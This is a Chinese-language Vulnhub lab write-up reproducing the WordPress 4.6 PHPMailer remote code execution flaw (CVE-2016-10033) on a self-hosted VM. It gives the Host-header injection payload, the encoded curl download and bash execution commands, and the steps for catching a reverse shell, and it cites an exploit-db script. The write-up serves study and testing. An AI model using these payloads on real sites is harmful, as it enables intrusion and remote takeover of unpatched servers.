Vulnhub-Wordpress 4.6 Remote Cod
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。
漏洞简述
WordPress ≤ 4.7.1使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。
准备环境
测试机IP:192.168.79.129
靶机IP:192.168.79.131
1. 启动Vulnhub靶机环境:
data:image/s3,"s3://crabby-images/2398e/2398ef69f5d38efce5b8b677e6b61e946d6e0fba" alt=""
2. 验证靶机应用启用成功:
data:image/s3,"s3://crabby-images/dac2c/dac2c776f9fe4acabe13a57ff9c6991e3ab31fd9" alt=""
3. 用wpscan扫描,能发现此漏洞
data:image/s3,"s3://crabby-images/e075c/e075c69c453d40e15ddc682742ff638b53faa3ae" alt=""
漏洞复现
方法一:手工利用
前提条件:
#执行的命令不能包含一些特殊的字符
#命令为小写字母
#命令使用绝对路径
#至少需要知道一个用户名
使用${substr{0}{1}{$spool_directory}}代替/
使用${substr{10}{1}{$tod_log}}代替‘空格’
POC:
参考:https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
HTTP Host标头:target(any -froot@localhost -be ${run{command}} null)
1. 使用Burp拦截找回密码页的访问,/wp-login.php?action=lostpassword
data:image/s3,"s3://crabby-images/5fab1/5fab1fe550af4334a1c1fad6d57a68b058958dc6" alt=""
data:image/s3,"s3://crabby-images/50f03/50f0331fe1b637de73918c829108f2b04887a60a" alt=""
2.准备反弹Shell文件
data:image/s3,"s3://crabby-images/67b7c/67b7c969e18488a32fe03d7ae0af9270b91e3d3d" alt=""
3. 开启python http server,供靶机下载反弹Shell文件
data:image/s3,"s3://crabby-images/ff066/ff066650284b878583d692550616864217093836" alt=""
4. 构建下载Shell文件命令
原命令:
/usr/bin/curl -o/tmp/shell 192.168.79.131/shell.sh
转换后命令:
${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.79.131${substr{0}{1}{$spool_directory}}shell.sh
5. 构建执行Shell文件命令
原命令:
/bin/bash /tmp/shell
转换后命令:
${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell
6. 使用Burp执行下载Shell文件命令(这里将8080端口去调了,不然报500错误)
data:image/s3,"s3://crabby-images/9869f/9869f51e643c23892842014bc3307dc7a4ebdbd3" alt=""
7. 使用NC侦听反弹端口
data:image/s3,"s3://crabby-images/5f168/5f1683b14aada1001f815a3a0020af382a44846a" alt=""
8. 使用Burp执行反弹Shell
data:image/s3,"s3://crabby-images/88e01/88e010c09b195bac3947718629ac0f044663cb19" alt=""
9. 得到反弹Shell
data:image/s3,"s3://crabby-images/46a3f/46a3f46a899e7e37cfaf856f2417f2649f1e668c" alt=""
方法二:使用现有的exp
引用:https://www.exploit-db.com/exploits/41962
data:image/s3,"s3://crabby-images/3a740/3a740523c8ae6032c394d71984a6089811179f2e" alt=""
1. 修改脚本
# 修改接收反弹shell的主机IP
data:image/s3,"s3://crabby-images/b9e86/b9e86d74011bcfb9ab7759d1c25bd57497b4369a" alt=""
2. 执行脚本,发现报错。因为脚本是针对windows环境的,需要将其转换成对应的linux格式。
data:image/s3,"s3://crabby-images/f3433/f34334cb411e1567e1204892be18d8950b79e5b4" alt=""
3. 转换脚本格式
data:image/s3,"s3://crabby-images/fceb5/fceb59e75778da5806d475bd9c2c520ff99c11a5" alt=""
4. 再次执行
data:image/s3,"s3://crabby-images/98ed4/98ed4e8e4da81ef2bd5846a8ddde9b58ef4b71b7" alt=""
5. 命令使用格式: exploit.sh target-wordpress-url,尝试执行,又发现反弹dns解析失败。
data:image/s3,"s3://crabby-images/ba3ab/ba3ab58cb54867552241b4d64cbbceb4e0f82ed7" alt=""
6. 由于没有使用DNS解析域名,再次修改脚本
data:image/s3,"s3://crabby-images/bb1a8/bb1a824d2ec45ceb4c794cf9c6d71470f182d62c" alt=""
7. 继续执行脚本:bash exploit.sh http://192.168.79.131:8080/ ,成功接收到反弹Shell。
data:image/s3,"s3://crabby-images/3bb2f/3bb2f5d32e5658058bb1e10cb03d910d18743111" alt=""
关闭环境
data:image/s3,"s3://crabby-images/15b0b/15b0b39f84f8fc6e89e4b9fcf7e2d2f0117ee092" alt=""